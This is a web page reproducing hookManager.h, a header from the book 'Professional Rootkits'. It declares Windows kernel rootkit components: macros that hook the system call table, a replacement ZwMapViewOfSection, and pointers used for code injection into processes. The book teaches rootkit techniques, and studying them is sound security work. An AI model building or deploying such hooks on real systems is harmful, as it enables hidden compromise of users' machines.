hookManager.h


The file hookManager.h has been expanded to define additional function prototypes, additional data structures, additional definitions, and the renamed hookKernel function:

  // Copyright Ric Vieler, 2006 // Support header for hookManager.c #ifndef _HOOK_MANAGER_H_ #define _HOOK_MANAGER_H_ NTSTATUS HookKernel( void ); BOOL IsSameFile( PUNICODE_STRING shortString, PUNICODE_STRING longString ); PVOID findUnresolved( PVOID pFunc ); int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size ); PVOID GetFunctionAddress( PVOID BaseAddress,  char* lpFunctionName,  PBYTE pattern,  size_t patternLength  ); // The kernel's Service Descriptor Table #pragma pack(1) typedef struct ServiceDescriptorEntry {  unsigned int *ServiceTableBase;  unsigned int *ServiceCounterTableBase;  unsigned int NumberOfServices;  unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack()  declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; // Our System Call Table extern PVOID* NewSystemCallTable; // Our Memory Descriptor List extern PMDL pMyMDL; // Needed for data injection extern PVOID kernel32Base; // Needed for version differences extern ULONG majorVersion; extern ULONG minorVersion; #define HOOK_INDEX(functionName) *(PULONG)((PUCHAR)functionName+1) #define HOOK(functionName, newPointer2Function, oldPointer2Function )  \  oldPointer2Function = (PVOID) InterlockedExchange( \  (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function) #define UNHOOK(functionName, oldPointer2Function)  \  InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function) typedef NTSTATUS (*ZWMAPVIEWOFSECTION)(  IN HANDLE SectionHandle,  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN ULONG CommitSize,  IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,  IN OUT PSIZE_T ViewSize,  IN SECTION_INHERIT InheritDisposition,  IN ULONG AllocationType,  IN ULONG Protect ); extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection; NTSTATUS NewZwMapViewOfSection(  IN HANDLE SectionHandle,  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN ULONG CommitSize,  IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,  IN OUT PSIZE_T ViewSize,  IN SECTION_INHERIT InheritDisposition,  IN ULONG AllocationType,  IN ULONG Protect ); // UNDOCUMENTED NTSYSAPI NTSTATUS NTAPI ZwCreateSection(  OUT PHANDLE SectionHandle,  IN ACCESS_MASK DesiredAccess,  IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,  IN PLARGE_INTEGER MaximumSize OPTIONAL,  IN ULONG SectionPageProtection,  IN ULONG AllocationAttributes,  IN HANDLE FileHandle OPTIONAL  ); NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory(  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN OUT PULONG RegionSize,  IN ULONG AllocationType,  IN ULONG Protect  ); // ZwProtectVirtualMemory won't resolve! // Need to extract from dll manually. NTSYSAPI NTSTATUS NTAPI ZwPulseEvent( HANDLE h, PULONG p ); NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(  IN HANDLE               ProcessHandle,  IN OUT PVOID            *BaseAddress,  IN OUT PULONG           NumberOfBytesToProtect,  IN ULONG                NewAccessProtection,  OUT PULONG              OldAccessProtection ); typedef NTSTATUS (*ZWPROTECTVIRTUALMEMORY)(  IN HANDLE               ProcessHandle,  IN OUT PVOID            *BaseAddress,  IN OUT PULONG           NumberOfBytesToProtect,  IN ULONG                NewAccessProtection,  OUT PULONG              OldAccessProtection ); extern ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory; // Undocumented object types extern POBJECT_TYPE* MmSectionObjectType; extern POBJECT_TYPE* PsProcessType; #define OBJ_INHERIT          0x00000002L #define OBJ_PERMANENT        0x00000010L #define OBJ_EXCLUSIVE        0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF           0x00000080L #define OBJ_OPENLINK         0x00000100L #define OBJ_KERNEL_HANDLE    0x00000200L #endif 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net